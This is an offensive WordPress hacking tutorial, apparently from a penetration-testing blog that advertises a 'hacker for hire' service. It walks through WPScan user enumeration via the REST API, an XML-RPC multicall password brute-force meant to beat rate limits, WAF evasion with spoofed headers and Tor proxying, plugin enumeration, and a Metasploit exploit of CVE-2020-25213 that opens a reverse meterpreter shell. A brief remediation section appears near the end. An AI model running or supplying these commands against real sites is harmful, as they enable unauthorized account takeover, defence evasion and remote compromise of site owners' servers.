Advanced WPScan: Tactical Enumeration and Brute-Force Techniques

wpscan --url target.com --passwords-attack xmlrpc --multicall-max-passwords 50

0x01. Escalation of Privilege: From Passive to Active

In our previous briefing, we established a passive reconnaissance foundation. However, when passive telemetry fails to yield an unauthenticated RCE vector, operators must transition to active engagement.

This phase is characterized by aggressive enumeration, tactical brute-forcing, and the evasion of perimeter defenses like Web Application Firewalls (WAFs).

In this masterclass, we detail the mechanics of advanced user discovery, weaponize the XML-RPC multicall vulnerability, manipulate HTTP headers to evade Cloudflare, and chain intelligence directly into the Metasploit Framework.

0x02. Advanced User Enumeration: Harvesting the Roster

Extracting specific usernames is critical for targeted attacks.

Vector A: The REST API Leak

Since version 4.7, WordPress notoriously leaks user data via the REST API.

# Harvest users via WPScan
wpscan --url https://target-site.com --enumerate u --api-token $WPSCAN_API_TOKEN

# Manual verification via curl + jq
curl -s https://target-site.com/wp-json/wp/v2/users | jq '.[].slug'

0x03. Weaponizing XML-RPC: The Multicall Brute-Force Attack

The xmlrpc.php file supports system.multicall, allowing an operator to bundle hundreds of password attempts into a single HTTP request, bypassing standard rate limits.

Executing the Attack via WPScan

wpscan --url https://target-site.com \
  -U target_users.txt \
  -P /opt/seclists/Passwords/10k-most-common.txt \
  --passwords-attack xmlrpc \
  --multicall-max-passwords 50 \
  --threads 10

0x04. Evasion Tactics: Defeating the WAF

Tactic 1: Signature Obfuscation

wpscan --url https://target-site.com \
  --random-user-agent \
  --headers "Accept-Language: en-US,en;q=0.9" \
  --headers "Referer: https://google.com/"

Tactic 2: Rate Limit Circumvention

wpscan --url https://target-site.com --throttle 3000 --threads 1

Tactic 3: Proxy Chaining (Tor)

wpscan --url https://target-site.com --proxy socks5://127.0.0.1:9050 --random-user-agent

0x05. Aggressive Plugin Discovery

Inactive or backend-only plugins are prime targets.

wpscan --url https://target-site.com \
  --enumerate ap \
  --plugins-detection mixed \
  --api-token $WPSCAN_API_TOKEN

0x06. The Kill Chain: Bridging to Metasploit

We will now chain a discovered vulnerability (e.g., CVE-2020-25213) into a Metasploit shell.

Metasploit Configuration

msfconsole -q
msf6 > use exploit/multi/http/wp_file_manager_rce
msf6 > set RHOSTS target-site.com
msf6 > set PAYLOAD php/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.50
msf6 > exploit

Target Compromised.

0x07. Blue Team Remediation

1. Neutralize XML-RPC: Block at the server layer.

location = /xmlrpc.php { deny all; access_log off; }

2. Lock Down REST API: Restrict access in functions.php.
3. Fail2Ban Integration: Automatically ban IPs brute-forcing plugin paths.

0x08. Strategic Evolution

In the final masterclass, we will automate these workflows using CI/CD and DevSecOps pipelines.

WordPress Hacking Article 03: Automating WPScan with CI/CD and DevSecOps Integration

/// INITIATE SECURE COMMS ///

Has your infrastructure been compromised? Mobile Hacker For Hire specializes in incident response and the recovery of compromised digital assets.

Contact Mobile Hacker For Hire for Incident Response and Expert Penetration Testing